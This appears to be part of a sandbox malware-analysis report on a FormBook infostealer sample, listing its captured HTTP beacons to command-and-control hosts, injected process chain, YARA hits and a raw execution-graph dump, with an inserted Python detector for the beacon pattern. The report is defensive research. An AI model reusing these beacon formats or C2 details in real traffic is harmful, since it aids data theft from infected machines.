                                                 Jan 11, 2025 06:56:27.288276911 CET  690 bytes  OUT  POST /b0aw/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.thinkone.xyz
                                                Origin: http://www.thinkone.xyz
                                                Referer: http://www.thinkone.xyz/b0aw/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 70 30 37 4b 51 4b 51 54 55 6f 4c 54 54 37 51 4a 42 6d 71 6b 6d 41 57 72 53 2f 68 63 6f 72 76 39 6d 5a 30 70 59 4e 56 63 73 73 55 67 54 69 45 76 4b 50 77 59 54 38 30 43 49 76 63 49 47 6b 54 69 76 5a 7a 44 44 48 53 7a 58 72 48 50 46 42 6b 4d 67 72 67 41 6c 71 74 38 42 66 6c 7a 59 65 57 51 79 70 36 6a 66 39 6f 35 45 71 71 47 6a 63 5a 41 39 69 6d 4f 49 37 2f 36 6e 49 77 70 30 4b 75 38 65 7a 56 58 4a 77 49 72 71 77 4b 76 69 7a 6a 64 6e 51 42 51 75 63 6d 51 71 6f 71 34 76 54 70 71 76 55 39 50 35 70 36 67 56 41 4b 32 62 33 4d 30 4a 74 68 38 2b 78 71 6b 72 4f 36 64 4e 54 7a 4b 33 32 6c 6c 69 53 4d 63 2f 4b 4d 3d
                                                Data Ascii: 94=YMGYuRah9o15p07KQKQTUoLTT7QJBmqkmAWrS/hcorv9mZ0pYNVcssUgTiEvKPwYT80CIvcIGkTivZzDDHSzXrHPFBkMgrgAlqt8BflzYeWQyp6jf9o5EqqGjcZA9imOI7/6nIwp0Ku8ezVXJwIrqwKvizjdnQBQucmQqoq4vTpqvU9P5p6gVAK2b3M0Jth8+xqkrO6dNTzK32lliSMc/KM=
                                                 Jan 11, 2025 06:56:27.861274004 CET  533 bytes  IN  HTTP/1.1 404 Not Found
                                                Date: Sat, 11 Jan 2025 05:56:27 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                 Session ID: 15  Source IP: 192.168.2.4  Source Port: 50019  Destination IP: 209.74.79.41  Destination Port: 80  PID: 5552  Process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                 Timestamp  Bytes transferred  Direction  Data
                                                 Jan 11, 2025 06:56:29.836471081 CET  10772 bytes  OUT  POST /b0aw/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.thinkone.xyz
                                                Origin: http://www.thinkone.xyz
                                                Referer: http://www.thinkone.xyz/b0aw/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 70 30 37 4b 51 4b 51 54 55 6f 4c 54 54 37 51 4a 42 6d 71 6b 6d 41 57 72 53 2f 68 63 6f 72 6e 39 6e 71 38 70 5a 75 74 63 74 73 55 67 50 79 45 79 4b 50 77 2f 54 2f 45 47 49 76 67 59 47 6e 37 69 70 4b 72 44 4b 57 53 7a 64 72 48 50 61 78 6b 4e 71 4c 67 56 6c 70 56 77 42 66 31 7a 59 65 57 51 79 75 43 6a 59 73 6f 35 47 71 71 48 71 38 5a 4d 71 79 6d 71 49 37 6e 41 6e 49 39 63 30 61 4f 38 5a 54 6c 58 47 6a 67 72 6a 77 4b 78 73 54 6a 46 6e 51 4e 35 75 63 54 70 71 74 2f 56 76 55 68 71 74 41 74 58 69 72 53 76 45 79 43 45 41 32 35 56 42 61 4a 6e 34 41 6a 5a 37 64 79 6f 56 67 6a 50 77 6e 77 77 6d 79 38 62 75 63 57 75 63 4c 42 6c 68 78 35 51 35 31 38 33 2b 32 66 78 41 42 6e 72 67 52 63 66 2b 67 2f 41 64 68 47 55 7a 39 79 6c 57 68 4c 45 46 2b 45 66 59 4b 79 37 64 35 57 37 70 39 59 50 66 4e 5a 39 70 48 6b 7a 55 71 61 44 37 36 73 67 62 4d 66 4d 2f 58 69 77 33 30 44 36 77 31 67 67 43 73 64 56 32 54 6b 44 67 33 41 55 64 56 34 52 65 73 48 49 35 2b 56 6d 71 4b 44 56 70 42 7a [TRUNCATED]
                                                 Data Ascii: 94=[TRUNCATED]
                                                 Jan 11, 2025 06:56:30.418767929 CET  533 bytes  IN  HTTP/1.1 404 Not Found
                                                Date: Sat, 11 Jan 2025 05:56:30 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                 Session ID: 16  Source IP: 192.168.2.4  Source Port: 50020  Destination IP: 209.74.79.41  Destination Port: 80  PID: 5552  Process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                 Timestamp  Bytes transferred  Direction  Data
                                                 Jan 11, 2025 06:56:32.376277924 CET  415 bytes  OUT  GET /b0aw/?TXVlY=nv6XU20pgPTDN0&94=VOu4tm+43rVZiGe5FbAiEYOvTb19T2jZsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLd6K3CAsSqZssuvcDLtxMQvu7+dmYX9caOt4= HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.thinkone.xyz
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                 Jan 11, 2025 06:56:32.948417902 CET  548 bytes  IN  HTTP/1.1 404 Not Found
                                                Date: Sat, 11 Jan 2025 05:56:32 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


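The sessions above all follow one client-side profile: a POST (or, as the last step, a GET) to a four-character directory such as /fpja/ or /b0aw/, a crawler User-Agent that no desktop browser sends, a Referer pointing back at the same URL, and a single numeric form key (here 94) whose value is a base64 blob; the same sequence of POSTs of 199, 219 and 10299 bytes followed by a GET is sent to each host in turn, and none of the three hosts answers with anything but a ddos-guard 301 to HTTPS, an Apache 404, or no reply at all. The following Python is an added example, not part of the Joe Sandbox report and not the sample's own code: a small request parser plus a classifier that flags that profile. The sample requests are constructed to mirror sessions 11 and 16 (the domains, paths, key name and base64 values are the ones visible in the report; the headers are abridged to those the checks use), and the indicator thresholds (four alphanumerics in the path, numeric key of at most three digits, exactly one extra query key on the GET) are this example's own assumptions derived from those sessions, not a published FormBook specification.

```python
import base64
import re
from dataclasses import dataclass

# User-Agent carried by every request in the captured sessions (a crawler UA).
CRAWLER_UA = "Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)"
# Paths seen in the capture: /fpja/, /b0aw/, /ixqi/ (assumption: four alphanumerics).
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
# Standard base64 alphabet with optional padding.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


@dataclass
class HttpRequest:
    method: str
    path: str
    query: str
    headers: dict
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Parse a raw HTTP/1.1 request: request line, headers, optional body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, query, headers, body)


def parse_form(data: str) -> dict:
    """Split key=value&key=value WITHOUT URL-decoding: the values are base64 on
    the wire and the '+' and '/' characters must survive untouched."""
    out = {}
    for pair in data.split("&"):
        key, _, value = pair.partition("=")
        if key:
            out[key] = value
    return out


def _b64_numeric_keys(params: dict) -> list:
    """Keys that are short all-digit names carrying a well-formed base64 value."""
    return [k for k, v in params.items()
            if k.isdigit() and len(k) <= 3 and B64_RE.match(v) and len(v) % 4 == 0]


def beacon_indicators(req: HttpRequest) -> list:
    """Return the indicators this request matches (empty list means no match)."""
    hits = []
    if req.headers.get("user-agent") == CRAWLER_UA:
        hits.append("crawler user-agent")
    if PATH_RE.match(req.path):
        hits.append("4-char directory path")
    host = req.headers.get("host", "")
    if req.headers.get("referer") == f"http://{host}{req.path}":
        hits.append("self-referencing referer")
    params = parse_form(req.body if req.method == "POST" else req.query)
    b64_keys = _b64_numeric_keys(params)
    if req.method == "POST" and len(params) == 1 and b64_keys:
        hits.append("single numeric form key with base64 blob")
    if req.method == "GET" and len(params) == 2 and len(b64_keys) == 1:
        hits.append("numeric query key with base64 blob plus one random key")
    return hits


def decoded_payload_size(req: HttpRequest) -> int:
    """Byte length of the base64 blob after decoding (0 when the request has none)."""
    params = parse_form(req.body if req.method == "POST" else req.query)
    for k in _b64_numeric_keys(params):
        return len(base64.b64decode(params[k]))
    return 0


# Constructed samples mirroring sessions 11 and 16 above, plus one benign request.
POST_BEACON = (
    "POST /fpja/ HTTP/1.1\r\n"
    "Host: www.newbh.pro\r\n"
    "Origin: http://www.newbh.pro\r\n"
    "Referer: http://www.newbh.pro/fpja/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: " + CRAWLER_UA + "\r\n"
    "\r\n"
    "94=FWG2A6JzYQIum/R2VM6bhQUyDFb8UInCKAg9ayp/7KGOwHTX70LrNNYDlm1MpiQ2nIH9yqhRrvLqqKIfSuTJchICyfJXd2CSSJvT115JP1REaicvnassNOUseO1s0WqhSxBo136h/WjzCG6bGj10CyKJGrPbLwHvKLj1gsDo3mhid1ZkSCPa8NqEYOG6JTWomsczalfNeMuFZZxkNqMN1/k="
)
GET_BEACON = (
    "GET /b0aw/?TXVlY=nv6XU20pgPTDN0&94=VOu4tm+43rVZiGe5FbAiEYOvTb19T2jZsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLd6K3CAsSqZssuvcDLtxMQvu7+dmYX9caOt4= HTTP/1.1\r\n"
    "Host: www.thinkone.xyz\r\n"
    "User-Agent: " + CRAWLER_UA + "\r\n"
    "\r\n"
)
BENIGN = (
    "GET /index.html?id=42 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/133.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("POST beacon", POST_BEACON), ("GET beacon", GET_BEACON), ("benign", BENIGN)):
        req = parse_request(raw)
        print(label, beacon_indicators(req), decoded_payload_size(req), "bytes")
```

The parser deliberately skips URL-decoding: a generic form parser would turn the '+' in the base64 value into a space and the blob would no longer validate. Matching on the single-key base64 body rather than the key name 94 alone is the more durable choice, since the key is the part of the profile most likely to differ between builds, while the crawler UA and the self-referencing Referer are cheap to pair with it in a proxy or NDR rule.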
                                                 Session ID: 17  Source IP: 192.168.2.4  Source Port: 50021  Destination IP: 46.38.243.234  Destination Port: 80  PID: 5552  Process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                 Timestamp  Bytes transferred  Direction  Data
                                                 Jan 11, 2025 06:56:38.024276018 CET  664 bytes  OUT  POST /ixqi/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.mraber.dev
                                                Origin: http://www.mraber.dev
                                                Referer: http://www.mraber.dev/ixqi/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 45 54 41 30 33 64 74 73 30 4d 5a 4d 49 72 4c 76 68 77 36 79 37 35 4e 31 35 58 73 5a 49 61 53 2f 6e 4d 65 66 4b 79 55 67 65 6b 42 38 58 6a 48 5a 4f 61 59 59 4c 72 58 63 75 2b 42 61 57 7a 56 6e 37 51 51 5a 75 35 51 46 58 4f 4c 72 73 37 6d 74 36 4f 63 55 48 55 62 52 6f 42 78 51 2f 53 36 69 30 43 50 4b 42 64 45 64 49 6e 6f 37 6c 4f 30 57 48 7a 4d 79 6d 5a 64 6a 68 75 6c 4e 2b 44 6d 33 58 55 37 75 76 74 6e 78 38 37 46 4e 4d 53 73 54 37 4c 33 6c 2f 73 59 45 36 79 6d 66 52 72 30 2f 32 61 6a 7a 41 30 6f 78 61 30 32 67 36 39 51 36 37 50 6a 4a 77 3d 3d
                                                Data Ascii: 94=ePVEYVDopSbyuETA03dts0MZMIrLvhw6y75N15XsZIaS/nMefKyUgekB8XjHZOaYYLrXcu+BaWzVn7QQZu5QFXOLrs7mt6OcUHUbRoBxQ/S6i0CPKBdEdIno7lO0WHzMymZdjhulN+Dm3XU7uvtnx87FNMSsT7L3l/sYE6ymfRr0/2ajzA0oxa02g69Q67PjJw==


                                                 Session ID: 18  Source IP: 192.168.2.4  Source Port: 50022  Destination IP: 46.38.243.234  Destination Port: 80  PID: 5552  Process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                 Timestamp  Bytes transferred  Direction  Data
                                                 Jan 11, 2025 06:56:40.571866989 CET  684 bytes  OUT  POST /ixqi/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.mraber.dev
                                                Origin: http://www.mraber.dev
                                                Referer: http://www.mraber.dev/ixqi/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Ascii: 94=ePVEYVDopSbyunLAyU1tqUMeJIrLkBw+y71N14DCFtKS/CIeeIaUjekBvXjGdOatYLnfcsaBaWXVn6gQZdQiKnOJkM7ewKOcUHUbRoVfQ/a6inaPFDlLeInpzFO0cXzIymZrjgyDN4Hm3Wk7gb5k786MT8TNCYqbgdxpPY6JVjTjzQX5ixV/jaQF990k34yqS7fFeVZQBkX//D4hG1rlNSk=


                                                Session ID:19
                                                Source IP:192.168.2.4
                                                Source Port:50023
                                                Destination IP:46.38.243.234
                                                Destination Port:80
                                                PID:5552
                                                Process:C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp:Jan 11, 2025 06:56:43.116882086 CET
                                                Bytes transferred:10766
                                                Direction:OUT
                                                Data:POST /ixqi/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.mraber.dev
                                                Origin: http://www.mraber.dev
                                                Referer: http://www.mraber.dev/ixqi/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)


                                                Session ID:20
                                                Source IP:192.168.2.4
                                                Source Port:50024
                                                Destination IP:46.38.243.234
                                                Destination Port:80
                                                PID:5552
                                                Process:C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp:Jan 11, 2025 06:56:45.658754110 CET
                                                Bytes transferred:413
                                                Direction:OUT
                                                Data:GET /ixqi/?94=TN9kbi/KmEXimVSL0ERanCo8EPrJiw0+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyN0TYvIjkiLeGXDgVU6Nef5fP7k6kFQJQYe0=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.mraber.dev
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)



                                                Target ID:0
                                                Start time:00:54:38
                                                Start date:11/01/2025
                                                Path:C:\Users\user\Desktop\BDlwy8b7Km.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\BDlwy8b7Km.exe"
                                                Imagebase:0x590000
                                                File size:1'334'784 bytes
                                                MD5 hash:95B9D05F97FBA1718D8C85967EBFFC4C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:00:54:41
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\BDlwy8b7Km.exe"
                                                Imagebase:0x160000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:00:55:05
                                                Start date:11/01/2025
                                                Path:C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe"
                                                Imagebase:0x680000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:6
                                                Start time:00:55:07
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\relog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\relog.exe"
                                                Imagebase:0x700000
                                                File size:45'568 bytes
                                                MD5 hash:DA20D543A130003B427AEB18AE2FE094
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:7
                                                Start time:00:55:20
                                                Start date:11/01/2025
                                                Path:C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe"
                                                Imagebase:0x680000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:8
                                                Start time:00:55:32
                                                Start date:11/01/2025
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff6bf500000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:3%
                                                  Dynamic/Decrypted Code Coverage:1%
                                                  Signature Coverage:5.1%
                                                  Total number of Nodes:1789
                                                  Total number of Limit Nodes:59
95735->95736 95737 5fd84d 95736->95737 95738 59525f 22 API calls 95737->95738 95739 5fd866 95738->95739 95740 594c6d 22 API calls 95739->95740 95741 5fd872 95740->95741 95742 5fd885 95741->95742 95743 5993b2 22 API calls 95741->95743 95744 594c6d 22 API calls 95742->95744 95743->95742 95745 5fd88e 95744->95745 95746 5fd89e 95745->95746 95747 5993b2 22 API calls 95745->95747 95748 5fd8b0 95746->95748 95749 59a8c7 22 API calls 95746->95749 95747->95746 95750 596350 22 API calls 95748->95750 95749->95748 95751 5fd8bb 95750->95751 96007 5fd978 22 API calls 95751->96007 95753 5fd8ca 96008 5fd978 22 API calls 95753->96008 95755 5fd8dd 95756 594c6d 22 API calls 95755->95756 95757 5fd8e7 95756->95757 95758 5fd8fe 95757->95758 95759 5fd8ec 95757->95759 95761 594c6d 22 API calls 95758->95761 95760 5933c6 22 API calls 95759->95760 95762 5fd8f9 95760->95762 95763 5fd907 95761->95763 95767 596350 22 API calls 95762->95767 95764 5fd925 95763->95764 95766 5933c6 22 API calls 95763->95766 95765 596350 22 API calls 95764->95765 95765->95718 95766->95762 95767->95764 95769 602954 __wsopen_s 95768->95769 95770 5afe0b 22 API calls 95769->95770 95771 602971 95770->95771 95772 595722 22 API calls 95771->95772 95773 60297b 95772->95773 96009 60274e 95773->96009 95775 602986 95776 59511f 64 API calls 95775->95776 95777 60299b 95776->95777 95778 602a6c 95777->95778 95779 6029bf 95777->95779 96041 602e66 75 API calls 95778->96041 96038 602e66 75 API calls 95779->96038 95782 6029c4 95787 602a75 ISource 95782->95787 96039 5bd583 26 API calls 95782->96039 95784 5950f5 40 API calls 95785 602a91 95784->95785 95786 5950f5 40 API calls 95785->95786 95789 602aa1 95786->95789 95787->95563 95788 6029ed 96040 5bd583 26 API calls 95788->96040 95790 5950f5 40 API calls 95789->95790 95792 602abc 95790->95792 95793 5950f5 40 API calls 95792->95793 95794 602acc 95793->95794 95795 5950f5 40 API calls 95794->95795 95797 602ae7 95795->95797 95796 602a38 95796->95784 95796->95787 95798 5950f5 40 API calls 
